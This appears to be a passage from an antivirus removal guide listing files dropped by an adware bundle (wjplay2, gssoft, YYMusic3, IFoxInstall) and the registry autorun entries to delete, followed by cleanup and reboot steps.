    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\环保绿.gss (42 bytes)
    %Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjRelated.dll (9098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAY2V666.htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].ashx (3 bytes)
    %Program Files%\wjplay2\20140507132818\Data\Err.html (1 bytes)
    %Program Files%\wjplay2\20140507132818\Data\err.jpg (784 bytes)
    %Program Files%\wjplay2\20140507132818\Data\def.jpg (1552 bytes)
    %Program Files%\wjplay2\20140507132818\Data\User2.ini (60 bytes)
    %Program Files%\wjplay2\20140507132818\Unins.exe (10136 bytes)
    %Program Files%\wjplay2\20140507132818\Data\wj.ico (784 bytes)
    %Program Files%\wjplay2\20140507132818\wjplay.exe (12088 bytes)
    %Program Files%\wjplay2\20140507132818\playlist.xml (53 bytes)
    %Program Files%\wjplay2\20140507132818\DuiLib.dll (16288 bytes)
    %Program Files%\wjplay2\20140507132818\bottom.xml (67 bytes)
    %Program Files%\wjplay2\20140507132818\Data\Def.html (902 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\配置工具\卸载wjplay2.lnk (847 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\官方主页.lnk (332 bytes)
    %Program Files%\wjplay2\20140507132818\Data\loading.gif (8 bytes)
    %Program Files%\wjplay2\20140507132818\Data\poptime_bg.png (1 bytes)
    %Program Files%\wjplay2\20140507132818\locallist.xml (167 bytes)
    %Program Files%\wjplay2\20140507132818\client.ini (1 bytes)
    %Program Files%\wjplay2\20140507132818\SysConfig.ini (2125 bytes)
    %Program Files%\wjplay2\20140507132818\PlayerUpdate.exe (5520 bytes)
    %Documents and Settings%\All Users\Desktop\wjplay2.lnk (828 bytes)
    %Program Files%\wjplay2\20140507132818\WJSpeed.exe (23424 bytes)
    %Program Files%\wjplay2\20140507132818\server.ini (1 bytes)
    %Program Files%\wjplay2\20140507132818\stat.ini (1 bytes)
    %Program Files%\wjplay2\20140507132818\Data\tab_more.png (4 bytes)
    %Program Files%\wjplay2\20140507132818\Data\EKanR.dat (10136 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\wjplay2.lnk (840 bytes)
    %Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe (9565 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\IFoxInstall-y-c203945859-run-s-x[1].exe (8818 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Expand.dll (10815 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Service.dll (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\WdjEngine.dll (14988 bytes)
    %Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\3026bf8d9e37080c8abcaaf6df47dbf3.exe (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\tj2[1].ashx (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\WJXMDT\DMSet.Xml (215 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
    %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AList[1].xml (62 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "GSMutualRunOne" = "%Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe RestartRunOneProgram"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YYMusic3_2014050713" = "%Program Files%\YYMusic3\2014050713\YYMusic2.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YYMusic3_News_2014050713" = "%Program Files%\YYMusic3\2014050713\YYSpeed2.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjplay2_News_20140507132818" = "%Program Files%\wjplay2\20140507132818\WJSpeed.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjplay2_20140507132818" = "%Program Files%\wjplay2\20140507132818\wjplay.exe -mini"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.